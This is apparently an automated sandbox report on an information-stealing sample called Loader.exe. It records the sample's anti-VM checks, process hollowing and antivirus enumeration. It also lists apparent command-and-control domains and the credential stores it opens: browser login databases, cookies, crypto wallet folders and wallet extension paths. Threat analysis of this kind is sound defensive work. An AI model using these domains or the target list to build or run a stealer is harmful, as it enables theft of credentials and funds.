                Source: C:\Users\user\Desktop\Loader.exe TID: 6672Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 5156Thread sleep count: 6133 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00ED0CF8 FindFirstFileExW,0_2_00ED0CF8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00ED0DA9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00ED0CF8 FindFirstFileExW,3_2_00ED0CF8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00ED0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00ED0DA9
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3408995278.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: Loader.exe, 00000003.00000002.3408995278.0000000000A7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPg
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3408995278.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: Loader.exe, 00000003.00000003.2234281590.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\Loader.exeAPI call chain: ExitProcess graph end nodegraph_3-33389
                Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043DA10 LdrInitializeThunk,3_2_0043DA10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EC72FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EC72FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EE619E mov edi, dword ptr fs:[00000030h]0_2_00EE619E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EB1690 mov edi, dword ptr fs:[00000030h]0_2_00EB1690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EB1690 mov edi, dword ptr fs:[00000030h]3_2_00EB1690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00ECC705 GetProcessHeap,0_2_00ECC705
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EBE06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00EBE06C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EC72FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EC72FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EBE42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EBE42C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EBE420 SetUnhandledExceptionFilter,0_2_00EBE420
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EBE06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00EBE06C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EC72FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00EC72FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EBE42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00EBE42C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EBE420 SetUnhandledExceptionFilter,3_2_00EBE420

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EE619E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00EE619E
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: Loader.exe, 00000000.00000002.2157725593.0000000002383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: volcanohushe.click
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00ED08CD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00ED0062
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00ED02B3
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00ECBA4C
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00ED034E
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00ED05A1
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00ED06D5
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00ED0600
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00ECBFF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00ED07C7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_00ED0720
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00ED08CD
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00ED0062
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00ED02B3
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00ECBA4C
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00ED034E
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00ED05A1
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00ED06D5
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00ED0600
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_00ECBFF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00ED07C7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_00ED0720
                Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EBEB50 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00EBEB50
                Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Loader.exe, 00000003.00000002.3408995278.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330663526.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409099739.0000000000AF5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409741821.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 504, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: Loader.exe, 00000003.00000003.2298552259.0000000000B29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn
                Source: Loader.exe, 00000003.00000003.2325081375.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Loader.exe, 00000003.00000003.2325081375.0000000000A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Loader.exe, 00000003.00000003.2325081375.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: Loader.exe, 00000003.00000003.2299980743.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Loader.exe, 00000003.00000003.2325081375.0000000000A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
